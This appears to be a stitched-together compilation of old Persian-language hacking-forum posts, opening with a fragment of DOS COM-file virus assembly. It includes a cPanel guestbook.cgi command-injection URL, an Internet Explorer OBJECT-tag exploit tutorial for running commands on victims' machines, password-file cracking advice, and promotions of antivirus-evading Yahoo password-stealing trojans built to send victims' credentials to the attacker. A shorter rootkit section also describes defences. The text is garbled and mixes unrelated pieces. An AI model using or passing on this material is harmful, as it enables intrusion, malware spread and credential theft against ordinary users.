db terminate ;Ends the program immediately msg15 db 'And if I refuse?',cr,lf,'$'
db return2host ;Runs host program immediately msg16 db 'Fuck the world and its followers!',cr,lf,'$'
db return2host ;Runs host program immediately msg17 db 'You are pathetic, man... you know that?',cr,lf,'$'
db terminate ;Ends the program immediately msg18 db 'Cum on! Talk DIRTY to me !!!',cr,lf,'$'
db terminate ;Ends the program immediately msg19 db 'Your coprocessor wears floppy disks!',cr,lf,'$'
db PauseKey ;Waits for keypress (SAKWR), then runs host prg msg20 db 'Joker! ver àà by TBSI!',cr,lf db 'Remember! EVERYTHING',39,'s bigger in Texas!',cr,lf,'$'
int24handler: xor al,al ;Ignore the error iret ;Interrupt return
filespec: db '*.COM',0 ;File specification prevdir: db '..',0 ;previous directory max2kill db 3 ;max. files to infect
eoec:;???????????????????????????????????????????????????End Of Encrypted Code VersionNumber dw 100h ;Version 1.00 encrypt_val db 0 ;1st-run copy only
; None of this information is included in the virus's code. It is only used ; during the search/infect routines and it is not necessary to preserve it ; in between calls to them.
eof: DTA:
db 21 dup (?) ;internal search's data attribute db ? ;attribute file_time db 2 dup (?) ;file's time stamp file_date db 2 dup (?) ;file's date stamp file_size db 4 dup (?) ;file's size filename db 13 dup (?) ;filename
SavedAX dw ? ;Used to save AX infected db ? ;infection count addr dw ? ;Address
Cpanel يك وب هاستينگ كنترل هست كه به شما اجازه ميده از طريق Client به كنترل هاستيگ خود بپردازيد . باگهاي موجود بر روي ورژن 5 اين سرويس به شرح زير است : Remote command Execution in guestbook.cgi با استفاده از باگي كه بر روي اين قسمت وجود دارد شما ميتونيد يصورت زير تمامي دستورات دلخواه خودتون را اجرا كنيد : [url]http://[your[/url] site.com]/cgi-sys/guestbook.cgi?user=cpanel&template=|[command]|
Local privileges escalation (root) اين اكسپلويت مربوط به Webmail ميباشد و اكسپلويت آن نيز بنام openwebmail-shared.pl موجود مياشد اين باگ در اين قسمت وجود دارد : /usr/local/cpanel/base/openwebmail/oom در لاين 14 if ( $ENV{'SCRIPT_FILENAME'} =~ m!^(.*?)/[wd-]+.pl! || $0 =~ m!^(.*?)/[wd-]+.pl! ) { $SCRIPT_DIR=$1; } if (!$SCRIPT_DIR) { print "Content-type: text/htmlnn$SCRIPT_DIR not set in CGI script!n"; exit 0; } push (@INC, $SCRIPT_DIR, "."); . راه حل : براي حل اين مشكلات 2 كار را امجام دهيد : 1.اين قسمت را بطور كل پاك كنيد /usr/local/cpanel/cgi-sys/guestbook.cgi 2.خاصيت suid را در اين قسمت غير فعال كنيد
دوستان سلام باز یه برنامه براتون میزارم که از ساخته های گروه برنامه نویسی ایران هست با این برنامه جالب میتوانید از طریق پورتی که ویروس آر پی سی روی اکثر ویندوزهای جهان باز کرده به سیستم طرف مقابل وصل شده و از آن شل بگیرید امید وارم از این برنامه لذت ببرید.
برای اينکه عملکرد يک پورت برای شما روشن شود، بايد به آن
پورت Telnet کنيد. (البته معمولا تعدادی از پورتهايی را که ممکن است اطلاعاتی مهم
را در اختيار هکرها قرار دهند مثل پورت ۷۹ معمولا بسته است و ارتباط با آنها شايد
برقرار نشود.) برای telnet کردن در command prompt دستور زير را تايپ
کنيد: telnet hostname portnum در اين دستور بهجای hostname شماره ip و يا
نام سايت را وارد میکنيد و بهجای portnum شماره پورت و يا معادل آن از جدول. مثلا
برای تلنت کردن به پورت ۱۳ که ساعت و تاريخ را بهدست میدهد در کامپيوتری به اسم
www.iums.ac.ir مينويسيد: telnet iums.ac.ir 13 telnet iums.ac.ir
daytime هر دو اين دستورات معادل هم هستند. تلنت کردن معمولا اولين کاری است
که يک هکر برای هک کردن يک سايت انجام میدهد، زيرا بعضی از پورتها در صورت بسته
نبودن روی آن سرور، معمولا حاوی اطلاعات بسيار مهمی هستند. همين الان شروع کنيد
و مثل يک هکر واقعی به کامپبوترهای مختلف و پورتهای گوناگون تلنت کنيد. مخصوصا
اگر پورت ۷۹ (finger) روی يک کامپيوتر باز بود، مرا هم خبر کنيد
(-;
◊ تقسيمبندی انواع
حملات
اولين نکتهای
که لازم است بگويم اينه که وقت خود را برای هک کردن کامپيوترهای کلاينت هدر ندهيد
(اگرچه برای افراد مبتدی کار با نرمافزاری مثل Sub7 زياد هم بد نيست ولی نبايد
زيادهروی کرد) علت هم اينه که هربار که به اينترنت وصل میشوند ip جديدی به آنها
اختصاص پيدا میکنه و زحماتتون هدر میره (البته برای جلوگيری از اين امر هم
روشهايی هست که در آينده ايشالله ميگم). حالا تقسيمبندی: ۱- حمله به روش
Denial of Service Attack) DoS) ۲- حمله به روش Exploit ۳- حمله به روش Info
Gathering (تلنت کردن يکی از مثالهای آن است که امروز آموختيد) ۴- حمله به روش
Disinformation
گاهی هکرها در هنگام نوشتن به جای تعدادی از حروف انگليسی
معادلهای قراردادی به کار میروند که ليست آنها را در زير میبينيد: 0 <=
O 1 <= L; I 2 <= Z 3 <= E 4 <= A 5 <= S 6 <=
G 7 <= T 8 <= B | <= L; I @ <= at (duh) $ <=
S )( <= H }{ <= H /\/ <= N \/\/ <= W /\/\ <=
M |> <= P; D |< <= K ph <= f z <=
s
مثلا he Speaks میشود: }{3 $|>34|< z توصيه من اينه که
از اين معادلها تا جايی که میتونيد استفاده نکنيد. فقط ياد بگيريد که کم
نياريد.
tracert ( در يونيکس میشود traceroute ) ابزاری است که نشان میدهد که يک packet اطلاعاتی از کامپيوتر شما چه مسيری را طی میکند و از چه کامپيوترهايی میگذرد تا به يک مقصد خاص برسد. مقصد را ما مشخص میکنيم و معمولا همان کامپيوتری است که داريم footprinting میکنيم.
کاربرد اين دستور به صورت زير است: tracert ip-or-domain مثلا میخواهم ببينم که از چه کامپيوترهايی بايد رد شويم تا به sazin.com برسيم. برای اينکار میتوان از يکی از دستورهای زير استفاده کرد: tracert sazin.com tracert 63.148.227.65 به نتيجه زير رسيدم: Tracing route to sazin.com [63.148.227.65] over a maximum of 30 hops:
1 160 ms 160 ms 160 ms 217.218.84.3 2 381 ms 691 ms 1772 ms 217.218.84.5 3 * * 2324 ms 217.218.77.1 4 201 ms 1101 ms 180 ms 217.218.0.252 5 341 ms 220 ms 180 ms 217.218.0.2 6 1993 ms 180 ms 181 ms 217.218.158.41 7 180 ms 160 ms 160 ms 195.146.63.101 8 2824 ms * * 195.146.32.134 9 1472 ms 1463 ms 871 ms 195.146.33.73 10 791 ms 841 ms 811 ms if-1....eglobe.net [207.45.218.161] 11 1692 ms * 2654 ms if-4-....eglobe.net [207.45.222.77] 12 1282 ms 891 ms 1052 ms if-1-....globe.net [207.45.220.245] 13 902 ms 931 ms 881 ms if-15.....globe.net [66.110.8.134] 14 931 ms 861 ms 871 ms if-8-....leglobe.net [64.86.83.174] 15 901 ms 841 ms 852 ms if-5-.....globe.net [207.45.223.62] 16 841 ms 862 ms 851 ms pos6-.....vel3.net [209.0.227.33] 17 841 ms 842 ms 941 ms so-4-1.....vel3.net [209.247.10.205] 18 882 ms 931 ms 851 ms so-0-1....vel3.net [209.247.11.197] 19 871 ms 891 ms 951 ms gige9....vel3.net [209.247.11.210] 20 1011 ms 851 ms 902 ms unknown.Level3.net [63.208.0.94] 21 852 ms * 882 ms 64.156.25.74 22 961 ms 942 ms 841 ms 63.148.227.65
Trace complete. اين نتايج نشان میدهد که بايد از ۲۲ کامپيوتر بگذرم تا به sazin.com برسم. اين اطلاعات همانطور که بعدا خواهيد ديد، حاوی اطلاعات زيادی برای پيدا کردن فايروالها و ... است. (بعضی سطرها رو کوتاه کردم و بهجاش .... گذاشتم)
tracert دارای تعدادی switch است که دوتاش رو توضيح میدم:
d- ==> با استفاده از اين سويچ در نتايج حاصله فقط ip ها نمايش داده میشود. مثلا مینويسيم: tracert sazin.com -d
h max-hops- ==> حداکثر تعداد گامها را تعيين میکند. حالت پيشفرض ۳۰ است. مثلا مینويسيم: tracert sazin.com -h 50
is one of the following: -syn = SYN scan -fin = FIN scan -null = Null scan -xmas = Xmas scan>br> (note: FIN, Null and Xmas scans don\'t work against Windows systems.
[optional parameters] are selected from the following: -sip = source IP for the scan -sp = source port for the scan -d = delay between scanned ports in milliseconds (default set to 750 ms)
1-20 [drop] 21 [open] 22 [closed or reject] 23-24 [drop] 25 [open] 26-52 [drop] 53 [open] 54-79 [drop] 80 [open] 81-109 [drop] 110 [open] 111-142 [drop] 143 [open] 144-200 [drop] 201-65535 [not scanned] Closed يعنی کامپيوتر در آن طرف هست ولی به پورت گوش نمیدهد، Reject يعنی اينکه يک firewall هست که اجازه اتصال به آن پورت را نمیدهد، Drop يعنی اينکه يک firewall همهچيز را پس میزند و يا اصلا کامپيوتری اونور نيست، Open هم که يعنی باز. در مورد سازين میبينيد که از بين پورتهای ۱ تا ۲۰۰ ، پورتهای ۲۱، ۲۵، ۵۳، ۸۰، ۱۱۰، ۱۴۳ باز است و میتوان به آنها telnet کرد. دقت کنيد که تا تمام پورتهايی که مشخص شده، تست نشده است، هيچ نتيجهای نشان داده نمیشود و يهکم صبر میخواد.
یک شيوه بسيار موثر براي پيدا کردن سرعت ISP استفاده از دستور Ping است.نحوه عملکرد اين دستور به اين صورت است که يک بسته 32 بايتي را به آدرس مورد نظر شما مي فرستد و منتظر پاسخ مي ماند.بر اساس زمان بدست آمده از اين رفت و برگشت مي توان به سرعت واقعي ISP پي برد.براي اجراي اين دستور به صورت زير عمل کنيد: 1-براي رفتن به محيط داس و خط فرمان Command Prompt را اجرا کنيد(در ويندوز 2000 و نسخه هاي جديدتر ويندوز Run را کليک کرده cmd را تايپ نماييد). 2-در صحفه ي Command Prompt دستور Ping www.yahoo.comرا تايپ کرده و Enter را بزنيد.به جاي ياهو هر آدرس ديگري را نيز مي توانيد استفاده کنيد. 3-براي ديدن نتيجه Ctrl+Break و براي خاتمه Ctrl+C را بزنيد. پس از طي مراحل فوق اطلاعات بدست آمده از عمل Pingنشان داده مي شود که شامل تعداد بسته هاي فرستاده شده و دريافت شده درصد از دست رفتن بسته ها و زمان round trip است.حال اگر در قسمت Averageميانگين به دست آمده حدود 700 باشد نشان دهنده سرعت مطلوب ISP شما است و اگر عدد بالاي 1000 باشد و يا پيام Request timed out دريافت کرده باشيد ISP شما چندان تعريفي ندارد.البته بايد توجه داشته باشيد که زمان هاي بدست آمده به کيفيت سرويس دهنده وب سايتي که آن را Ping مي کنيد نيز بستگي دارد.بنابراين توصيه مي شود سايتي را ping کنيد که از کيفيت آن مطمئن باشيد مثلا Yahoo يا google.
RootKitها برنامه هایی هستند که از نظر ساختار کاری بسیار شبیه Trojan ها و Backdoor ها هستند ولی با این تفاوت که شناسایی RootKit بسیار مشکلتر از درب های پشتی است زیرا RootKit ها علاوه بر اینکه به عنوان یک برنامه کاربردی خارجی مثل شنونده Netcat و ابزارهای درب پشتی مثل Sub7 بر روی سیستم اجرا می شوند بلکه جایگزین برنامه های اجرایی مهم سیستم عامل و در گاهی مواقع جایگزین خود هسته کرنل می شوند و به هکرها این اجازه را می دهند که از طریق درب پشتی و پنهان شدن در عمق سیستم عامل به آن نفوذ کنند و مدت زیادی با خیال راحت با نصب ردیابها ( Sniffer ) و دیگر برنامه های مانیتورینگ بر روی سیستم اطلاعاتی را که نیاز دارند بدست آورند. در دنیای هکرها دو نوع RootKit اصلی وجود دارد که هر کدام تعریف جداگانه ای دارند. 1- RootKit سنتی : RootKit های سنتی با شناسایی اولین RootKit بسیار قدرتمند در اویل سال 1990 در طول یک دهه گسترش پیدا کردند و تا آنجا پیش رفتند که امروزه انواع مختلفی از RootKit های سنتی وجود دارند که به طور عملی خودشان نصب شده و به هکرها اجازه می دهند که به سرعت سیستم قربانی را فتح کنند. RootKit های سنتی برای سیستم عامل های مختلف نوشته شده اند ولی به طور سنتی بر روی سیستم های یونیکس مثلHP-UX - AIX - Linux - Solaris - SunOS و از این قبیل تمرکز کرده اند. ولی برای ویندوزهای سرور مثل NT/2000 نیز RootKit هایی نوشته شده اند که جایگزین کتابخانه های پیوند پویا ( DLL ) شده و یا سیستم را تغییر می دهند ولی تعداد زیادی از RootKit ها برای سیستم های یونیکس نوشته شده اند. RootKit ها اجازه دسترسی Root یا Administrator را به ما نمی دهند و ما هنگامی قادر به نصب آْنها بر روی یک سیستم هستیم که دسترسی ریشه ای و مدیر یک سیستم را توسط روش های دیگری مثل سرریز بافر ... به دست آورده باشیم. بنابراین یک RootKit یک سری ابزارهایی است که با پیاده سازی یک درب پشتی ( Backdoor ) و پنهان کردن مدارک استفاده از سیستم و ردپاها به هکر اجازه نگهداری دسترسی سطح ریشه را می دهد. ساختار کار تروجن ها به این صورت است که فایلی را در داخل هسته سیستم مثل پوشه System32 اضافه می کند و این فایل تمامی پسوردهای قربانی را Log کرده و برای هکر می فرستد و یا با باز کردن پورتی اجازه ورود هکر را از طریق پورت باز شده می دهد ولی RootKit های سنتی به جای اینکه فایلی در هسته سیستم قربانی اضافه کنند، سرویسها و فایل های اصلی و مهم سیستم عامل قربانی را با یک نسخه تغییر یافته آن که عملیاتی مخرب انجام می دهد جایگزین می کنند. برای مثال RootKit های معروف در سیستم های یونیکس برنامه /bin/loginرا که یکی از اساسی ترین ابزارهای امنیتی در Unix است را با یک نسخه تغییر یافته که شامل یک کلمه عبور درب پشتی برای دسترسی سطح ریشه می باشد عوض می کنند. سیستم های یونیکس از برنامه /bin/login برای جمع آوری و تست UserID های کلمات عبور استفاده می کند. /bin/login شناسه کاربری و پسورد تایپ شده توسط کاربر را با فایل پسوردها مقایسه می کند تا تعیین کند که پسورد داده شده توسط کاربر صحیح است یا خیر. اگر پسورد داده شده درست باشد روتین /bin/loginبه آن User اجازه ورود به سیستم را می دهد. خب با این توضیحی که دادیم فرض کنید که یک RootKit این برنامه را با برنامه نوشته شده خود عوض کند. اگر هکر از پسورد ریشه درب پشتی استفاده کند، برنامه /bin/login تغییر یافته و اجازه دسترسی به سیستم را می دهد. حتی اگر مدیر سیستم پسورد ریشه اصلی را عوض کند، هکر هنوز می تواند با استفاده از کلمه عبور ریشه درب پشتی به سیستم وارد شود. بنابراین یک روتین RootKit ، /bin/login یک درب پشتی است زیرا می تواند برای دور زدن کنترل های امنیتی نرمال سیستم مورد استفاده قرار گیرد. علاوه بر آن یک اسب تروا هم هست زیرا فقط چهره آن یک برنامه نرمال و زیبای Login است ولی در اصل یک Backdoor است. اکثر RootKit ها سرویس ها و برنامه هایی مثل DU - Find - Ifconfig - Login - ls - Netstat - ps را با RootKit خود جابه جا می کنند. هر یک از این برنامه های سیستمی با یک اسب تروای منحصر به فرد جایگزین می شود که عملکرد آنها شبیه به برنامه عادی است. همه این برنامه های Unix مانند چشم و گوش های مدیران سیستم می باشد که تعیین می کنند چه فایل ها و سرویس هایی در حال اجرا هستند. هکرها با پوشاندن چشم و گوشهای مدیران سیستم که توسط RootKit انجام می شود می توانند به صورت موثری حضورشان را در یک سیستم مخفی نگه دارند. linux RootKit 5 ( lrk5 ) و Tornkit دو نمونه از RootKit های سنتی هستند که برای سیستم های Linux و Solaris نوشته شده اند و در سایت آشیانه می توانید این RootKit ها را پیدا کنید. این RootKit ها به محض نصب شدن در سیستم قربانی خود را با سرویس های حیاتی و مهم سیستم عامل که در بالا ذکر شد جایگزین می کنند. 2- RootKit سطح هسته : این نوع از RootKit ها نسبت به نوع سنتی بسیار حرفه ای تر هستند و از نظر سطح پنهان سازی بسیار پا را فراتر از نوع سنتی گذاشته اند زیرا این RootKit ها در سطح ریشه پیاده سازی می شوند و این کار شناسایی و کنترل کردن آنها را بسیار مشکل تر کرده است. RootKit های سطح هسته به ما کنترل کاملی از سیستم اصلی و یک امکان قدرتمند برای جایگیری می دهد. یک هکر با ایجاد تغییرات اساسی در خود هسته، می تواند سیستم را در سطحی بسیار اساسی کنترل کرده و قدرت زیادی برای دسترسی به درب پشتی و پنهان شدن در ماشین را به دست آورد. خود هسته در حالی که یک کرنل زیبا و کارآمد به نظر می رسد تبدیل به یک اسب تروا می شود و در حقیقت Kernel فاسد می شود ولی صاحب سیستم از این موضوع بی خبر می ماند. درحالی که یک RootKit سنتی جایگزین برنامه های سیستمی حیاتی مثل برنامه های ifconfig - ls ... می شود ، یک RootKit سطح هسته در حقیقت جایگزین هسته می شود و یا آن را تغییر می دهد. تمامی فایل ها - دستورها - پردازشها و فعالیت های شبکه ای در سیستم آلوده به RootKit هسته پنهان می شوند و تمامی اعمال به سود هکر ضبط می شود. اغلب RootKit های سطح ریشه توسطLKM ها پیاده سازی می شوند. نصب RootKit های سطح هسته ای که توسطLKM ها پیاده سازی شده باشد، بسیار راحت است. برای مثال برای نصبKnrak Rootkit که برای هسته لینوکس نوشته شده است، یک هکر که با Account سطح ریشه یا همان Root به آن سیستم وصل است تنها کافی است insmod knark.o, را تایپ کند و ماژول نصب می شود و منتظر دستورات هکر می ماند و حتی نیازی به بوت کردن دوباره سیستم هم ندارد. RootKit های سطح هسته برای ویندوز NT هم وجود دارند که یک Patch را بر روی خود هسته اجرایی ویندوز NT بدون استفاده ازLKM ها اعمال می کند. چند تا از معروف ترین RootKit های سطح هسته Knrak و Adore برای سیستم های لینوکس ، Plasmoid برای سیستم های Solaris و RootKit سطح هسته ویندوز NT برای سیستم های سرور ویندوز نام دارند که همگی در لینک RootKit در سایت آشیانه برای اعضای سایت قرار داده شده اند. راه های مقابله با RootKit های سنتی و RootKit های سطح هسته مهمترین راه دفاع در برابر RootKit ها اجازه ندادن به هکرها در دسترسی به حساب مدیر است. همانطور که در بالا ذکر شد یک هکر برای نصب یک RootKit باید دسترسی سطح ریشه داشته باشد و اگر ما بتوانیم همیشه راه های نفوذ و آسیب های جدید سیستم عاملمان را شناسایی و آنها را از بین ببریم شانس دستیابی هکر به حساب ریشه سیستم خود را تقریباً به صفر رسانده ایم. در مرحله بعد اگر فرض کنیم که با بی احتیاطی ما ، هکری توانست بر روی سیستم ما RootKit نصب کند، یکی از راه های تست این که سیستم ما RootKit شده است یا خیر استفاده از دستورEcho است. تعداد بسیار کمی از RootKit ها ، دستور echo را که برای لیست کردن محتویات یک دایرکتوری می باشد تروا می کنند و اکثر RootKit ها بر روی تروا کردن ls تمرکز کرده اند. به همین دلیل echo یک لیست قانونی از محتویات یک دایرکتوری را برمی گرداند و اگر نتیجه ای که echo بر می گرداند با چیزی که دستور ls برای دایرکتوری داده شده نشان می دهد متفاوت باشد ممکن است چیزی در آن دایرکتوری پنهان شده باشد که این نتیجه را می رساند که سیستم شما RootKit شده است. ولی در کل این روش زیاد موثر نیست چون جستجوی تمام سیستم فایل برای یافتن هر اختلافی بین فایل های لیست شده در خروجی Echo و ls وقت زیادی را صرف می کند. امروزه ابزارهای مختلفی برای آنالیز برنامه Rootkit/bin/login وجود دارد که مشخص می کنند آیا RootKit شناخته شده ای نصب شده است یا خیر. این ابزارها وقتی که بر روی سیستم نصب می شوند به صورت دوره ای فایل های مهم بر روی سیستم را مثل /bin/login چک می کنند تا از وجود RootKit باخبر شوند که برنامه ChRootkit ابزاری جالب در این زمینه است ولی درکل بهترین راه دفاع در برابر RootKit ها استفاده از تکنولوژی اثر انگشت دیجیتالی قوی می باشد تا به صورت دوره ای درستی فایل های سیستم بحرانی را تحقیق نماید. MD5 ( یک تابع درهم ساز یک طرفه ) یک الگوریتم بسیار مناسب برای محاسبه این نوع اثر انگشتهای قوی می باشد. با محاسبه یک اثر انگشت Encrypt شده قوی برای فایل های سیستمی مهم یک هکر قادر نخواهد بود که فایلی را تغییر داده و با همان اثر انگشت وارد شود.TripWire یک ابزار قوی برای تست صحت است که در سایت آشیانه برای دانلود قرار داده شده است. TripWire درهم سازی MD5 ای از فایل های بحرانی مثل/etc/passwd/bin/login - ls - ps و ... ساخته و به صورت دوره ای این درهم سازی را با یک پایگاه داده ای امن مقایسه می کند. در صورت تغییر در MD5 یک سرویس سریع به مدیر سیستم اطلاع می دهد. همچنین در RootKit های سطح هسته Scan پورت ها در شبکه که با استفاده از ابزارهایی مثل Nmap صورت گیرد پورت های شنونده را به مدیر امنیتی سیستم نشان خواهد داد. به همین دلیل پویش دوره ای سیستم در طول شبکه برای پیدا کردن رد RootKit بسیار مفید است. در آخر ذکر این نکته لازم است که اگر سیستم شما با تمام این ملاحظات آلوده به RootKit شد بهترین راه از بین بردن آن فرمت هسته و نصب مجدد سیستم عامل است.( رضا اعظمی ).
چگونه به وسیله sperlocource با کمی دستورات html هک کنیم ؟ (مبحث 2 )
روشی رو که میخواهم به شما یاد بدم روش هک کردن بوسیله آسيب پذيري در اينترنت اكسپلورر هست البته اين روش روي سيستمهايي كه روشون اينترنت اكسپلورر ورژنهاي 5 تا 6 هست كارايي داره که حدود 90 درصد و یا بیشتر از همین نوع استفاده میکنند... البته در ایران. خب براي استفاده ازاين روش به صورت كلاسيك نيازمند هستين به 2 تا فايل از نوع HTML ساده (يادتون باشه فقط اين فرمت كارايي داره و نه هيچكدوم از بقيه فرمتهاي وب).خلاصه گفتم كه نيازمند 2 تا فايل از نوع اچ تي ام ال ساده هستيم كه توي اين مثالي كه براتون ميارم يكي رو Exploit.htm و اون يكي رو Request.htm نامگذاري كرديم . شخصي كه بايد هك بشه فقط كافي هست كه فايل Request.htm رو دريافت كنه و اون موقع هست كه ميتونين هر كاري كه دلتون خواست انجام بدين. و اما محتواي اين فايلها چي هست ؟ ابتدا محتواي فايل اكسپلويت رو تشريح ميكنم. اين فايل بايد حاوي تگهاي زير باشه كه در اصل يك آبجكت ايجاد ميكنه كه هرچي سر قرباني مياد اين آبجكت مياره. بعد هم با استفاده از متد اجراي اين آبجكت ميتونين هر چي رو كه خواستين روي كامپيوتر طرف اجراكنين وبیچاره بشه ....... حالا ببينين محتواي اين فايل Explot.htm چي ميتونه باشه :
اين محتواي يك فايل اكسپلويت نمونه هستش كه ليبل درايو سي رو عوض ميكنه. ميتونين به جاي اين دستور هر چيز ديگه اي قرار بدين ( خدا منو ببخشه) تا اجرابشه. حتي ميتونين فايل داونلود و اجراكنين كه البته اين كار رو يه كم پيچيده تر ميكنه تا اينجا يكي از فايلها رو داريم واما اون يكي فايل. فايل دوم يا همون فايل درخواست ميتونه همه چي باشه و فقط بايد اين تگ رو توش داشته با شه كه به فايل اول مراجعه ميكنه : <OBJECT id=OBJECT1 data=exploit.htm></OBJECT> البته توي اين مثال فرض شده كه فايل اول همون جايي هست كه فايل دوم هستش والا اين فايل ميتونه هر جاي وب باشه . اين تگ يك آبجكت ايجاد ميكنه و اون رو ارجاع ميده به فايل اول كه كد دلخواه ما توش هست و اينطوري هست كه طرف بدبخت ميشه. اين هم محتواي يك فايل در خواست نمونه :
چگونه بفهميم آي دي مورد نظر تو کدوم رومه؟ هنگام PM با فرد مورد نظر منوي فايل رو باز كنيد و Go To Chat User...رو انتخاب كنيد.بعد از دادن idمورد نظر و زدن okوارد رومي ميشويد كه فرد مورد نظرتون اونجاست.ميتونيد از طريق منوي پايين رو كه كنار id خودتون از طريق يكidديگه كه طرف نميشناسه وارد بشيد كه طرف نفهمه شما وارد شديد. هرگز بوت نشويد نترسيد و راحتر چت کنيد ! کدهايي که شمارو بوت مي کنن فيلتر کنيد خوب براي اين کار به شاخه C:Program FilesYahoo!Messenger ilter1.txt برويد و فايل filter1.txt را باز کنيد و در خط کدهاي زير وارد کنيد ,url,onLoad=,که در بعضي سيستم ها بايد با يک , و يک فاصله بعد از اين کارکتر اين کار رو بکنيد ! با اين کار شما بوتر هارو غير فعال مي کنيد
همانطور كه مي دانيد اتاق هاي !Yahoo داراي قوانين خاصي هستند .حداكثر نفرات داخل اتاق 40 نفر مي باشد و اگر آن اتاق داراي ظرفيت كامل باشد يعني 40 نفر در آن آنلاين باشند , ديگر نمي توان وارد اتاق شد . اما گاهي مي توان اين قوانين را زير پا گذاشت .
حتما تا به حال شده كه جلوي نام يك اتاق در ليست اتاق هاي Yahoo ببينيد : (40) . ولي خيلي تمايل داشته باشيد وارد آن اتاق شويد .اگر بخواهيد وارد چت رومي كه پر است (يعني 40 نفر در آن آنلاين هستند) شويد مراحل زير را دنبال كنيد:
۱ـابتدا يك چت روم بسازيد كه هيچ كس داخل آن نيست . حال كد روبرو را در قسمت پيغام تايپ كنيد و كليد Enter را بزنيد. /join X
(كه بجاي X بايد نام چت رومي كه پر هست و قصد ورود به آن را داريد را تايپ كنيد.)
ممكن است با پيغامي كه مي گويد اين چت روم پر است مواجه شويد.يك مدت صبر كنيد و دوباره كد بالا را وارد كنيد.اين بار وارد چت روم پر خواهيد شد!!!
سرور چيزي نيست جز يک کامپيوتر که تعدادي فايل و دايرکتوري روي ان ذخيره شده . سيستم عامل اين کامپيوتر به گونه ايست که علاوه بر دسترسي مستقيم به ان ( تا اينجا مثل هر کامپيوتري) اجازه ميدهد که افراد از کامپيوتر هاي ديگري که از طريق يک شبکه بدان کامپيوتر متصل اند به ان فايل ها دسترسي داشته باشند. اما براي دسترسي به اين فايل ها مقرراتي وجود دارد که همان admin معروف که سرپرستي اين شبکه را بر عهده دارد وضع ميکند. او دسترسي به بعضي فايل ها را محدود و به بعضي ديگر را مجاز ميسازد. يا براي دسترسي به فايل ها پس ورد هايي کي گذارد که تنها افراد خاصي بدان ها دسترسي داشته باشند. تمام تلاش هکر دسترسي به اين فايل هاست که دسترسي بدين فايل ها بواسطه پس وردي محدود شده است. پس تا اينجا واضح شد که هر کس براي دسترسي به اين فايل ها بايد حداقل با سيستم عامل ان سرور خاص اشنا باشد. و بعد نيز با شيوه دسترسي به اين فايل ها از راه دور (ftp). حالا فرض کنيد که ان سيستم عامل يونيکس است و شما قصد داريد فايل اچ تي ام ال حاوي اطلاعات مربوط به صفحه اول سايتي دست يافته به جاي ان صفحهاي قرار دهيد که حاوي اسم شريفتان با ادرس ايميلتان است ( مثلا : "اين سايت توسط من "علی سلیمی" هک شد. اي ميل:XXXX@xxx.XXX") براي اين کار شما تلاش خواهيد کرد که مثل کامپيوتر خانه يتان وارد دايرکتوري مربوطه شده فايل x را انگولک کنيد. ان اول ها انجام يک چنين کاري بسيار ساده بود اما هر چه مي گذرد دسترسي به اين فايل مشکل و مشکل تر ميشود ( البته هاست هاي ايران که هنوز عقب افتاده تر از اين حرفهايند) مثال: حالا فرض کنيد که اين سرور از ان نسبتا عقب مانده هاست و ما نيز قصد داريم به شيوه نسبتا بدوي و اما مهم از جنبه اموزشي ان فايل را انگولک کنيم. ابتدا مواد مورد نياز: دانستن دستورهاي ساده يونيکس : HELP = HELP COPY = CP MOVE = MV DIR = LS DEL = RM CD = CD همين ها بس است. داشتن برنامهاي مثل Cracker Jack و يا مشابه مه بعدا مي گوييم چه کار مي کند. حالا بايد راهي پيدا کرد که بر ان پس ورد لعنتي فائق امد ( که البته همه کار همين است ) در سيستم هاي بونيکس تمام پس ورد هاي سيستم در داخل فايلي که در دايرکتوري به نام : /etc است قرار دارند. پس فايل ما ادرسش مي شود : /etc/passwd . اگر فکر مي کنيد که با دسترسي به اين فايل همه پس وردها از انه شماست و کار انجام شده ، در اشتباهيد. زيرا تمام اطلاعاته موجود در اين فايل به صورتي يک طرفه "کد" شده اند و عملا "decode " کردن ان ممکن نيست. پس چه بايد کرد: ان برنامه اي که ان بالا اسمش را بردم (Cracker Jack) برنامه ايست که ان فايل کد شده را برداشته و سعي مي کند با تطبيق دادن ان با کلماتي از پيش معين . پس ورد هاي موجود در ان فايل را پيدا کند .(مثل کاري که يک باستان شناس براي خواندن خط باستاني مي کند). پس کل عمليات ساده شد به دستسي به فايل پسوردها و کشف رمزها بواسطه ان برنامه . نکته اينجاست که ان ادمين کذايي قرار نيست که پس ورد ها را دودستي به شما تقديم کند. براي دسترسي به ان فايل پس ورد ها بايد از ftp استفاده کنيد
برنامه ای برای اذیت کردن اد لیستهای شما که گاهی اوغات منجر به دی سی شدن اد لیستها هم میشود کار این برنامه این است که با آنلاین و آفلاین کردن مداوم باعث اذیت اد لیستها میشود فقط کافیه برنامه را باز کنید و دکمه استارت را بزنید.
این برنامه یکی از جدید ترین برنامه در زمینه هک ایدی که ۲ روز ساخته شده و این جدید ترین وژنشه وهیچ انتی ویروسی حتی norton 2005 که قوی ترین انتی ویروس جهان است اونو نمیشناسه و ایکنش هم شبیه ایکنهای ویندوز اکس پی که دیگه کسی شک نکنه.
شما با استفاده از این نرم افزار بسیار قوی میتوانید ایدی طرف رو هک ومشخصات کامل ویندوز طرف رو بدست بیارید مزیت این نرم افزار نصبت به نرم افزار قبل اینه که قربانی به هیچ وجه نمیتونه اونو از سیستم خودش پاک کنه حتی اگر ویندوزشو عوض کنه بازم برنامه پاک نمیشه و هیچ انتی ویروسی اونو نمیشناسه.
اموزش کامل برنامه:
در قسمت ۱ ادرس ایمیل خود وارد کنید
در قسمت ۲ مانند شکل بالاعمل کنید
در قسمت ۳ از گزینه open میتوانید شکل ایکون را انتخاب کنید
در قسمت ۴ پسوند فایل را انتخاب کنید
و در اخر روی گزینه Build کیلیک کنید فایل شما در پوشه برنامه ساخته میشود .
حال برنامه را به قربانی Send میکنیماگر شخص مقابل روی فایل ارسالی از طرف شما کلیک
ينم بهزاد پی اس ورژن ۱.۷ نرم افزاری قوی برای هک پسورد ایدی با ایکن های فارسی
Behzad Psبه دلایل زیر نسبت به نمونه های مشابه برتری دارد :
1-هیچ تغییری در شکل ظاهری قسمت ورود پسورد یاهو نمیدهد . در صورتی که Magic PS یا Smart Ps هر دو ستاره های پسورد را از نظر ظاهری تغییر میدهند ( آنها را کوچکتر میکنند یا گاهی پسورد کاملا دیده میشود ) ولی Behzad Ps به دلیل استفاده از Code Injection این مشکل را ندارد .
2-مانند Magic Ps دز هنگام ارسال پسورد پنجره PM را باز و بسته نمیکند . یا مانند Smart Ps توسط FireWall شناسایی نمیشود
3-و از همه مهمتر اینکه تمامی اکانتهای اینترنت را نیز ارسال میکند ( حتی تو xp ) که از این لحاظ بی نظیر است .
